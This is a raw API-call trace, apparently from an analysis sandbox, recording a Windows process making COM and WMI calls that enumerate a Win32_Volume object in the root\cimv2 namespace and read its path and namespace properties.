	[0196.203] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b842748, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.203] WbemLocator:IUnknown:Release (This=0x1b842748) returned 0x3
	[0196.204] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0196.204] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x4
	[0196.204] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b842830) returned 0x0
	[0196.204] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x4
	[0196.204] WbemLocator:IRpcOptions:Query (in: This=0x1b842830, pPrx=0x1b842860, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0196.204] WbemLocator:IUnknown:Release (This=0x1b842830) returned 0x3
	[0196.204] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x2
	[0196.204] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0196.205] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0196.205] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x3
	[0196.205] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd181d8) returned 0x0
	[0196.205] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x3
	[0196.205] IUnknown:Release (This=0x1cd181d8) returned 0x2
	[0196.205] IUnknown:Release (This=0x1cd181d8) returned 0x1
	[0196.205] WbemLocator:IUnknown:Release (This=0x1cd14808) returned 0x2
	[0196.206] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0196.206] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0196.206] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.206] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0196.206] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0196.206] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x2
	[0196.206] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd181d8) returned 0x0
	[0196.206] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x2
	[0196.206] IUnknown:AddRef (This=0x1cd181d8) returned 0x3
	[0196.206] IEnumWbemClassObject:Clone (in: This=0x1cd181d8, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd18368) returned 0x0
	[0196.327] IUnknown:QueryInterface (in: This=0x1cd18368, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd18370) returned 0x0
	[0196.327] IClientSecurity:QueryBlanket (in: This=0x1cd18370, pProxy=0x1cd18368, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0196.327] IUnknown:Release (This=0x1cd18370) returned 0x1
	[0196.327] IUnknown:QueryInterface (in: This=0x1cd18368, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b849130) returned 0x0
	[0196.327] IUnknown:QueryInterface (in: This=0x1cd18368, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd18370) returned 0x0
	[0196.327] IClientSecurity:SetBlanket (This=0x1cd18370, pProxy=0x1cd18368, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.335] IUnknown:Release (This=0x1cd18370) returned 0x2
	[0196.335] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x1
	[0196.335] CoTaskMemFree (pv=0x1b8395f0) 
	[0196.335] IUnknown:QueryInterface (in: This=0x1cd18368, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b849130) returned 0x0
	[0196.335] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0196.337] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0196.338] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x3
	[0196.338] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0196.338] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b849018) returned 0x0
	[0196.338] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b849018, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.338] WbemLocator:IUnknown:Release (This=0x1b849018) returned 0x3
	[0196.338] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0196.338] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x4
	[0196.338] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b849100) returned 0x0
	[0196.339] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x4
	[0196.339] WbemLocator:IRpcOptions:Query (in: This=0x1b849100, pPrx=0x1b849130, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0196.339] WbemLocator:IUnknown:Release (This=0x1b849100) returned 0x3
	[0196.339] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x2
	[0196.339] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0196.339] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0196.339] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x3
	[0196.339] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd18368) returned 0x0
	[0196.339] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x3
	[0196.340] IUnknown:Release (This=0x1cd18368) returned 0x2
	[0196.340] IUnknown:Release (This=0x1cd18368) returned 0x1
	[0196.340] IUnknown:Release (This=0x1cd181d8) returned 0x2
	[0196.340] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0196.340] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0196.340] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x2
	[0196.340] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd18368) returned 0x0
	[0196.340] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x2
	[0196.341] IUnknown:AddRef (This=0x1cd18368) returned 0x3
	[0196.341] IEnumWbemClassObject:Reset (This=0x1cd18368) returned 0x0
	[0196.345] IUnknown:Release (This=0x1cd18368) returned 0x2
	[0196.345] CoTaskMemAlloc (cb=0x8) returned 0x1b84aaf0
	[0196.345] IEnumWbemClassObject:Next (in: This=0x1cd18368, lTimeout=-1, uCount=0x1, apObjects=0x1b84aaf0, puReturned=0x1c6ece78 | out: apObjects=0x1b84aaf0*=0x1cd18410, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0196.615] IUnknown:QueryInterface (in: This=0x1cd18410, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd18410) returned 0x0
	[0196.616] IUnknown:QueryInterface (in: This=0x1cd18410, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0196.616] IUnknown:QueryInterface (in: This=0x1cd18410, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0196.616] IUnknown:AddRef (This=0x1cd18410) returned 0x3
	[0196.616] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0196.616] IUnknown:QueryInterface (in: This=0x1cd18410, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd18418) returned 0x0
	[0196.616] IMarshal:GetUnmarshalClass (in: This=0x1cd18418, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0196.616] IUnknown:Release (This=0x1cd18418) returned 0x3
	[0196.617] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0196.617] IUnknown:AddRef (This=0x1cd18410) returned 0x4
	[0196.617] IUnknown:QueryInterface (in: This=0x1cd18410, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0196.617] IUnknown:Release (This=0x1cd18410) returned 0x3
	[0196.617] IUnknown:Release (This=0x1cd18410) returned 0x2
	[0196.617] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0196.617] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0196.617] IUnknown:AddRef (This=0x1cd18410) returned 0x3
	[0196.617] IUnknown:QueryInterface (in: This=0x1cd18410, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd18410) returned 0x0
	[0196.617] IUnknown:Release (This=0x1cd18410) returned 0x3
	[0196.617] IUnknown:Release (This=0x1cd18410) returned 0x2
	[0196.617] IUnknown:Release (This=0x1cd18410) returned 0x1
	[0196.618] CoTaskMemFree (pv=0x1b84aaf0) 
	[0196.618] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0196.618] IUnknown:AddRef (This=0x1cd18410) returned 0x2
	[0196.618] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0196.618] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0196.618] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0196.618] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0196.618] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0196.618] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0196.618] IUnknown:Release (This=0x321868) returned 0x1
	[0196.619] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd118c0) returned 0x0
	[0196.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd118c0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
	[0196.619] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd118c0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd1a150) returned 0x0
	[0196.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1a150, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd1a150) returned 0x0
	[0196.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1a150, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0196.620] WbemDefPath:IUnknown:AddRef (This=0x1cd1a150) returned 0x3
	[0196.620] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0196.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1a150, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b83a800) returned 0x0
	[0196.620] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b83a800, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.620] WbemDefPath:IUnknown:Release (This=0x1b83a800) returned 0x3
	[0196.621] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0196.621] WbemDefPath:IUnknown:AddRef (This=0x1cd1a150) returned 0x4
	[0196.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1a150, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0196.621] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x3
	[0196.621] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x2
	[0196.621] WbemDefPath:IUnknown:Release (This=0x1cd118c0) returned 0x0
	[0196.621] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x1
	[0196.621] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0196.621] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0196.621] WbemDefPath:IUnknown:AddRef (This=0x1cd1a150) returned 0x2
	[0196.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1a150, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd1a150) returned 0x0
	[0196.622] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x2
	[0196.622] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x1
	[0196.622] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0196.622] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0196.622] WbemDefPath:IUnknown:AddRef (This=0x1cd1a150) returned 0x2
	[0196.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1a150, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd1a150) returned 0x0
	[0196.622] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x2
	[0196.622] WbemDefPath:IUnknown:AddRef (This=0x1cd1a150) returned 0x3
	[0196.622] WbemDefPath:IWbemPath:SetText (This=0x1cd1a150, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0196.622] WbemDefPath:IUnknown:Release (This=0x1cd1a150) returned 0x2
	[0196.622] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0196.622] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0196.622] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.623] CoTaskMemAlloc (cb=0x8) returned 0x1b84aaf0
	[0196.623] IEnumWbemClassObject:Next (in: This=0x1cd18368, lTimeout=-1, uCount=0x1, apObjects=0x1b84aaf0, puReturned=0x1c6ece78 | out: apObjects=0x1b84aaf0*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0196.795] CoTaskMemFree (pv=0x1b84aaf0) 
	[0196.795] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0196.795] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x1
	[0196.795] IUnknown:Release (This=0x1cd18368) returned 0x0
	[0196.831] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0196.831] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0196.831] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.831] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0196.831] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.831] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0196.831] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.831] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0196.831] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
